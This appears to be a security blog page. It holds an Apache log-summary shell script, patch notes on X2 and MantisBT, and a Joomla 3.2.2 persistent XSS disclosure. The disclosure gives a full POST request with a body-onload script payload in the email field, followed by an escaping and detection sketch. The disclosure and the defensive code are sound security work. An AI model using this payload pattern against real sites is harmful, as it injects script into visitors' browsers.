As far as I can see in my Apache logs, the last few weeks were very busy for a few guys trying to hack my honeypot ;)
Good job guys!
For some reason I decided to create a very simple (but useful) 'log-reader' for Apache.
You can obviously add it to cron or just run it as a normal Bash script.
Here is the code:
---<code>---
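#!/bin/sh
# Summarise an Apache access log: list every client address with its
# DNS/whois details and the requests it sent.
ACCESS="/var/log/apache2/access.log"
FOUND="found.log"
UNIQ="uniq.log"
echo
echo "**** Test Apache logs... ****"
echo
# The first field of each log line is the client address.
cut -d' ' -f1 "$ACCESS" > "$FOUND"
# uniq alone only drops adjacent duplicates, so sort and de-duplicate in one step.
sort -u "$FOUND" > "$UNIQ"
# Redirect into wc so only the number is printed, not the file name.
echo "[+] Found host(s) : $(wc -l < "$UNIQ")"
for host in $(cat "$UNIQ"); do
echo "--------------------------------------------------------------"
echo "[+] Testing : $host"
host "$host"
# Registries differ in capitalisation ("country:" vs "Country:"), hence -i.
whois "$host" | grep -i -e "country\|address"
echo ""
echo "[+] looking for: "
# Exact match on the first field (a plain grep would also match 11.2.3.4
# when looking for 1.2.3.4); fields 6-8 are the quoted request line.
awk -v h="$host" '$1 == h { print $6, $7, $8 }' "$ACCESS"
echo "--------------------------------------------------------------"
done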
---<code>---
Monday, 31 March 2014
Wednesday, 26 March 2014
[EN] X2 Community - update for you
A few days ago I found that X2 is vulnerable to a few web attacks.
After the great work of the X2 Team, below you will find a link to information about
the new update.
Check here ;)
Great job X2 Team!
Monday, 3 March 2014
[EN] New release of MantisBT 1.2.17
After the last patching of MantisBT, there is a fresh new version!
Check the details about the new release and remember to install the patch ;)
More details about this finding you can get here or here
Once again, big thanks for the excellent cooperation go to the Dev Team of Mantis!
Great job!
[EN] Joomla 3.2.2 pre-auth persistent XSS
Maybe you want to verify... ;)
# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 288
jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---
And:
---<response>---
(...)
title="<strong>Email</strong><br />Email for contact">Email<span class="star"> *</span></label></div>
<div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
</div>
(...)
---<response>---
From Burp it looks like this:
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# ==============================================================
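The response above shows the submitted `jform[contact_email]` value written into the `value` attribute without HTML escaping. The following is an added Python sketch, not Joomla's code and not part of the original advisory (the template string and all function names are illustrative assumptions); it renders the field raw and escaped, then parses both results to check which markup a parser actually sees:

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample: the contact_email parameter from the request above.
BODY = 'jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com'
# Illustrative template modelled on the <input> element in the response.
TEMPLATE = '<input type="email" name="jform[contact_email]" value="{}" size="30" />'

def submitted_email(body):
    """Decode the form body the way the server receives it."""
    return parse_qs(body)["jform[contact_email]"][0]

def render_raw(value):
    """Behaviour seen in the response: value copied into the attribute as-is."""
    return TEMPLATE.format(value)

def render_escaped(value):
    """Hardened form: escape &, <, > and both quote types before output."""
    return TEMPLATE.format(escape(value, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag with its attributes, in document order."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def injected_markup(html, expected_value):
    """List the signs that user input escaped the value attribute."""
    parser = TagCollector()
    parser.feed(html)
    parser.close()
    # The template contains exactly one element; anything after it is injected.
    findings = [f"unexpected <{tag}>" for tag, _ in parser.tags[1:]]
    findings += [f"handler {name} on <{tag}>"
                 for tag, attrs in parser.tags
                 for name in attrs if name.startswith("on")]
    # The parser decodes entities, so a safe render round-trips the input.
    if not parser.tags or parser.tags[0][1].get("value") != expected_value:
        findings.append("value attribute truncated")
    return findings

if __name__ == "__main__":
    email = submitted_email(BODY)
    print("raw     :", injected_markup(render_raw(email), email))
    print("escaped :", injected_markup(render_escaped(email), email))
```

The same round-trip check can be used as a regression test for any form field that is written back into an attribute.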